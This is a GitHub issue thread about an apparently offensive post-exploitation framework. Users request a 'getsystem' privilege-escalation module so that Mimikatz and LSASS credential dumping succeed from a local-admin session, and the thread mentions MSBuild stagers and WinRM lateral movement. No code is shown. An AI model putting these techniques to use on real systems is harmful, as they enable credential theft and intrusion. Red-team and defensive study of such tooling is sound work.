Closed kildonan5 closed 4 years ago
b4cktr4ck2
commented
5 years ago Definitely would love to see an elevation of privilege module (via Process Injection, Token Impersonation, etc).
If there's any way I can assist I'd love to help out (testing, writing/porting the modules from Meterpreter)
byt3bl33d3r
commented
4 years ago This was added in the newest update. Some changes are going to be needed to make it a bit more streamlined but the code is there. Cheers
kildonan5
commented
4 years ago When you say this was added, do you mean a getsystem module/feature? I have not had a chance to test it again (im having installing the dependencies) but watched your webinar, and when it came to dump creds (minidump module), you got the error "not in a high integrity process".
At that point you said you 'cheated' and started boo/winrm lateral movement module (to launch a stager on a seperate machine, that was already in a high integrity process?).
How do you move to a high integrity process (getsystem essentially) when you are not in a high integrity process (but the user is a local administrator)?
Context
ST Setup & resulting behavior
HTTPS Listener on 8080 MSBuild stager executed on Windows Server 2016 client, under the context of a domain user in the local administrators group Module = ipy/mimikatz run all
Output:
Expected Behavior
ST Should attempt to elevate privileges to system, before running the Mimikatz and/or any LSASS related modules. Alternatively create a separate module (such as MSF 'get system') which would achieve this purpose.
Current Behavior
Even if the session is running under the context of a user in the administrators group, LSASS modules, fail to execute (dump memory).